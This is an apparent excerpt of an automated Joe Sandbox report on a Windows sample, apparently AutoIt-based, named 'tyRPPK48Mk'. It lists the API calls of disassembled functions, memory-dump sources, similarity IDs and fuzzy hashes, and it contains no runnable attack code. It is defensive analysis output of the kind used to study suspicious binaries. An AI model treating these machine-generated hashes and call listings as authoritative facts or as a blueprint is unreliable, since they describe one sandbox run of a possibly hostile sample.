• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00430258
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                                                                                                                                                                                                                                                                                                                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                                                                                                                                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
APIs
• GetWindowRect.USER32(?,?), ref: 00430BA2
• ScreenToClient.USER32(?,?), ref: 00430BC1
• ScreenToClient.USER32(?,?), ref: 00430BE2
• InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: ClientRectScreen$InvalidateWindow
• String ID:
• API String ID: 357397906-0
APIs
• __wsplitpath.LIBCMT ref: 0043392E
  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
• __wsplitpath.LIBCMT ref: 00433950
• __wcsicoll.LIBCMT ref: 00433974
• __wcsicoll.LIBCMT ref: 0043398A
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
• String ID:
• API String ID: 1187119602-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1597257046-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                                                                                                                                                                                                                                                                                                                                                                                • __malloc_crt.LIBCMT ref: 0041F5B6
                                                                                                                                                                                                                                                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 237123855-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                                                                                                                                                                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                                                                                                                                                                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2223660684-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                                                                                                                                                                                                                                                                                                                                                                                • LineTo.GDI32(?,?,?), ref: 00447326
                                                                                                                                                                                                                                                                                                                                                                                                                                • EndPath.GDI32(?), ref: 00447336
                                                                                                                                                                                                                                                                                                                                                                                                                                • StrokePath.GDI32(?), ref: 00447344
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2783949968-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2710830443-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                                                                                                                                                                                                                                                                                                                                                                                • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 146765662-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • __getptd_noexit.LIBCMT ref: 00415150
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                                                                                                                                                                                                                                                                                                                                                                                                • __freeptd.LIBCMT ref: 0041516B
                                                                                                                                                                                                                                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 00415173
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1454798553-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _strncmp
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Q\E
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 909875538-2189900498
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: AutoIt3GUI$Container
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2652923123-3941886329
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsnicmp.LIBCMT ref: 00467288
                                                                                                                                                                                                                                                                                                                                                                                                                                • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: LPT
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3035604524-1350329615
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _memcmp
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: &
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2931989736-1010288
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00466825
                                                                                                                                                                                                                                                                                                                                                                                                                                • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CrackInternet_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: |
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 596671847-2343686810
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: '
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • _strlen.LIBCMT ref: 0040F858
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                                                                                                                                                                                                                                                                                                                                                                                • _sprintf.LIBCMT ref: 0040F9AE
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _memmove$_sprintf_strlen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: %02X
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1921645428-436463671
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Combobox
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-2096851135
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: LengthMessageSendTextWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: edit
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2978978980-2167791130
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
• Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
APIs
• Sleep.KERNEL32(00000000), ref: 00476CB0
• GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
• Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
• Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
• Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: htonsinet_addr
• String ID: 255.255.255.255
• API String ID: 3832099526-2422070025
